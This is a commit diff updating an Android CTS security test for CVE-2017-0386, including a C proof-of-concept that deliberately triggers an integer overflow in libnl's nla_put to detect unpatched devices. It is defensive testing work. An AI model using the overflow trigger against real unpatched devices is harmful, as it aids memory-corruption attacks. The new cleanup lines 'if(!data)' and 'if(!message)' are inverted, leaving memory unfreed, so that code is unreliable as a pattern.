[RESTRICT AUTOMERGE]: CTS test fix for android security CVE-2017-0386

Bug: 72495142
Bug: 32255299
Test: cts-tradefed run cts -m CtsSecurityBulletinHostTestCases -t android.security.cts.Poc17_01#testPocCVE_2017_0386
Change-Id: I51fb7aa7be837694cb7a7f40b988fc8a3ae6fe24
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0386/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0386/Android.mk
index c1c86f3..85ec107 100755
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0386/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0386/Android.mk
@@ -16,24 +16,23 @@
 
 include $(CLEAR_VARS)
 LOCAL_MODULE := CVE-2017-0386
-
-LOCAL_SHARED_LIBRARIES := libnl \
-                          libc \
-                          liblog
-
 LOCAL_SRC_FILES := poc.c
-LOCAL_C_INCLUDES := external/libnl/include
-
 LOCAL_MULTILIB := both
 LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
 LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
 
+LOCAL_C_INCLUDES := external/libnl/include
+
+LOCAL_SHARED_LIBRARIES := \
+    libnl \
+    libc \
+    liblog \
+
 # Tag this module as a cts test artifact
 LOCAL_COMPATIBILITY_SUITE := cts sts
 LOCAL_CTS_TEST_PACKAGE := android.security.cts
 
 LOCAL_ARM_MODE := arm
 LOCAL_CFLAGS += -Wall -Werror
-LOCAL_LDFLAGS += -fPIE -pie
-LOCAL_LDFLAGS += -rdynamic
+
 include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0386/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0386/poc.c
index bb762ba..e899bd6 100755
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0386/poc.c
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0386/poc.c
@@ -1,5 +1,5 @@
-/*
- * Copyright (C) 2018 The Android Open Source Project
+/**
+ * Copyright (C) 2019 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -14,65 +14,85 @@
  * limitations under the License.
  */
 #define _GNU_SOURCE
+
+#define LOG_TAG "CVE-2017-0386"
+
 #include <sys/wait.h>
 #include <sys/types.h>
+#include <stdio.h>
+#include <log/log.h>
 #include <netlink-local.h>
 #include <netlink/netlink.h>
 #include <netlink/msg.h>
-#include <stdio.h>
-#include <log/log.h>
+#include <netlink/attr.h>
+
+#include "../includes/common.h"
 
 int main(void) {
   struct nl_msg *message = NULL;
-  char *pad = NULL, *pad2 = NULL;
+  struct nlmsghdr *hdr;
+  char *data = NULL;
   uint32_t result = 0;
+  int ret = EXIT_SUCCESS;
+  int pagesize = getpagesize();
+  size_t payloadlength = pagesize + 12 - 0x30;
+  size_t payload2length = pagesize;
 
   message = nlmsg_alloc();
   if (message == NULL) {
     ALOGE("Alloc message memory failed");
-    goto ret;
+    return EXIT_FAILURE;
   }
 
   ALOGI("nl_msg.nm_size : %zx\n", message->nm_size);
-
-  struct nlmsghdr *hdr;
   hdr = message->nm_nlh;
 
-  int length = 0x1000 + 12 - 0x30;
-  pad = malloc(length);
-  if (pad == NULL) {
-    ALOGE("Alloc pad memory failed");
-    goto ret;
+  //allocate memory for data with payloadlength
+  data = malloc(payloadlength);
+  if (data == NULL) {
+    ALOGE("Alloc data memory failed");
+    nlmsg_free(message);
+    return EXIT_FAILURE;
   }
-  memset(pad, 0x41, length);
 
-  pad2 = malloc(0x1000);
-  if (pad2 == NULL) {
-    ALOGE("Alloc pad2 memory failed");
-    goto ret;
-  }
-  memset(pad2, 0x33, 0x1000);
-
-  nla_put(message, 0x4444, length, pad);
-  result = message->nm_nlh->nlmsg_len;
-
+  memset(data, 0x41, payloadlength);
+  nla_put(message, 0x4444, payloadlength, data);
+  result = hdr->nlmsg_len;
   ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
-  ALOGI("message len = 0x%x", message->nm_nlh->nlmsg_len);
+  ALOGI("message len = 0x%x", result);
 
-  nla_put(message, 0x8888, 0xFFFFF000, pad2);
+  free(data);
+  data = NULL;
+
+  //allocate memory for data with payload2length
+  data = malloc(payload2length);
+  if (data == NULL) {
+    ALOGE("Alloc data2 memory failed");
+    nlmsg_free(message);
+    return EXIT_FAILURE;
+  }
+  memset(data, 0x33, payload2length);
   ALOGI("\n\n\nPutting down overflow.......\n\n\n");
+  nla_put(message, 0x8888, 0xFFFFF000, data);
 
   ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
-  ALOGI("message len = 0x%x", message->nm_nlh->nlmsg_len);
+  ALOGI("message len = 0x%x", hdr->nlmsg_len);
 
-  if(result == message->nm_nlh->nlmsg_len) {
-    ALOGE("No Integer overflow");
-  } else {
-    ALOGE("Integer overflow happened");
+  /*
+   * return 113 error code if length is mismatch
+   */
+  if(result != hdr->nlmsg_len) {
+    ret = EXIT_VULNERABLE;
   }
 
-ret:
-  if(NULL != pad) free(pad);
-  if(NULL != pad2) free(pad2);
-  return 0;
+  if(!data) {
+    free(data);
+    data = NULL;
+  }
+
+  if(!message) {
+    nlmsg_free(message);
+    message = NULL;
+  }
+  return ret;
 }
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
index 889bd7d..148e824 100755
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
@@ -132,10 +132,6 @@
      */
     @SecurityTest(minPatchLevel = "2017-01")
     public void testPocCVE_2017_0386() throws Exception {
-        AdbUtils.runCommandLine("logcat -c" , getDevice());
-        AdbUtils.runPoc("CVE-2017-0386", getDevice(), 60);
-
-        String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
-        assertMatchesMultiLine("No Integer overflow", logcat);
+        AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2017-0386", getDevice(), 60);
     }
 }